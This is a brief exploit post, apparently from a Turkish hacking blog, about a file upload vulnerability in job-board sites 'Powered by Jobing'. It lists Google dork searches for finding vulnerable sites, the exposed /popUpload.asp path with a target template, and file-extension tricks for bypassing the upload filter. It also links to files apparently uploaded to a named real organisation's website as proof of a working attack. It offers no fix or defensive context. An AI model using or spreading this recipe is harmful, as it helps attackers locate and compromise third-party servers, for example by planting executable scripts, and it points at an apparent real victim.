Powered by Jobing File Upload Vulnerability
Author: KkK1337
Google Dork: inurl:"popUpload.asp"
Google Dork: intext:"Powered by Jobing.com Local Jobs"
Exploit path: /popUpload.asp
Exploit example: http://www.[target].com/popUpload.asp
Bypass: php3,phtml,asp,aspx,asp;.txt
File Access:
Document: http://www.naaahrdallas.org/files/81...ments/tech.txt
Image: http://www.naaahrdallas.org/files/819/images/tech.gif
Hiç yorum yok :
Yorum Gönder